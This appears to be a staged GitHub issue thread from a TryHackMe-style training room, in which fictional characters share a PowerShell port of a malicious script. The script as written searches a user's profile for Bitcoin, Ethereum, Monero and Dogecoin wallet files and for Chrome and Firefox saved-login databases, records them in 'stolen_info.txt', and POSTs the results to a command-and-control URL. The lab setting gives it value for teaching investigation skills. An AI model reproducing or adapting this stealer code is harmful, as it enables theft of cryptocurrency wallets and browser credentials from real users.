Bloatware-WarevilleTHM / CryptoWallet-Search

Developing experimental scripts to be used to search for crypto wallets and send the information to a C2 server that would be set up. Still a work in progress and will be unleashed to the people of Wareville.
1 stars 0 forks source link

PowerShell Version of this? #1

Open MM-WarevilleTHM opened 3 weeks ago

MM-WarevilleTHM commented 3 weeks ago

Hey Bloatware,

I came across this pretty cool C++ script of yours and would like to use it for Wareville. My only issue is that I'm not too good with C++ and I don’t really vibe. I’m much more comfortable with PowerShell.

The code does some interesting things, like searching for wallet and browser credential files and sending the findings to a C2 server. I’d love to cross-check my PowerShell version of this, especially since my C++ skills are about as sharp as a butter knife these days.

Appreciate any guidance! Please save me from pointer madness 😅.

Bloatware-WarevilleTHM commented 3 weeks ago

Hey MM, Thanks for the shoutout. Haha, I totally get it! Pointers and memory management can feel like trying to defuse a bomb with a toothpick.

I’m guessing it’s the file searching and C2 communication that’s got you sweating. Share your code, and we'll see what we have.

MM-WarevilleTHM commented 3 weeks ago

Exactly! The part where it’s checking for wallet files and credential files is straightforward, but I’m not sure how PowerShell handles things like sending data to a server.

This is what I’ve got currently and did away with the malloc and free in PowerShell (thank goodness).

function Print-AsciiArt {
    Write-Host "  ____     _       ___  _____    ___    _   _ "
    Write-Host " / ___|   | |     |_ _||_   _|  / __|  | | | |"  
    Write-Host "| |  _    | |      | |   | |   | |     | |_| |"
    Write-Host "| |_| |   | |___   | |   | |   | |__   |  _  |"
    Write-Host " \____|   |_____| |___|  |_|    \___|  |_| |_|"

    Write-Host "         Created by the one and only M.M."
}

# Call the function to print the ASCII art
Print-AsciiArt

# Path for the info file
$infoFilePath = "stolen_info.txt"

# Function to search for wallet files
function Search-ForWallets {
    $walletPaths = @(
        "$env:USERPROFILE\.bitcoin\wallet.dat",
        "$env:USERPROFILE\.ethereum\keystore\*",
        "$env:USERPROFILE\.monero\wallet",
        "$env:USERPROFILE\.dogecoin\wallet.dat"
    )
    Add-Content -Path $infoFilePath -Value "`n### Crypto Wallet Files ###"
    foreach ($path in $walletPaths) {
        if (Test-Path $path) {
            Add-Content -Path $infoFilePath -Value "Found wallet: $path"
        }
    }
}

# Function to search for browser credential files (SQLite databases)
function Search-ForBrowserCredentials {
    $chromePath = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Login Data"
    $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\*.default-release\logins.json"

    Add-Content -Path $infoFilePath -Value "`n### Browser Credential Files ###"
    if (Test-Path $chromePath) {
        Add-Content -Path $infoFilePath -Value "Found Chrome credentials: $chromePath"
    }
    if (Test-Path $firefoxPath) {
        Add-Content -Path $infoFilePath -Value "Found Firefox credentials: $firefoxPath"
    }
}

# Function to send the stolen info to a C2 server
function Send-InfoToC2Server {
    $c2Url = "http://papash3ll.thm/data"
    $data = Get-Content -Path $infoFilePath -Raw

    # Using Invoke-WebRequest to send data to the C2 server
    Invoke-WebRequest -Uri $c2Url -Method Post -Body $data
}

# Main execution flow
Search-ForWallets
Search-ForBrowserCredentials
Send-InfoToC2Server
Bloatware-WarevilleTHM commented 3 weeks ago

Haha, yes, you’re free from the malloc/free life! PowerShell will take care of memory for you. For sending data to the server, PowerShell’s Invoke-WebRequest is your best friend and looks like you set it up nicely – it’s a lot easier than dealing with cURL’s verbosity.

This script keeps it nice and simple – no need for C++’s struct stat for checking file existence; PowerShell’s Test-Path handles it for you. For sending the data, Invoke-WebRequest makes the C2 part painless.

Also, I like the ASCII art you have included on it. 🙂

MM-WarevilleTHM commented 3 weeks ago

Thanks a lot! This would have gone a totally different way when I was thinking of writing a PowerShell script with malloc – I was about to go full C++-PowerShell hybrid and possibly break the universe.

The ASCII was just a touch of flair 😉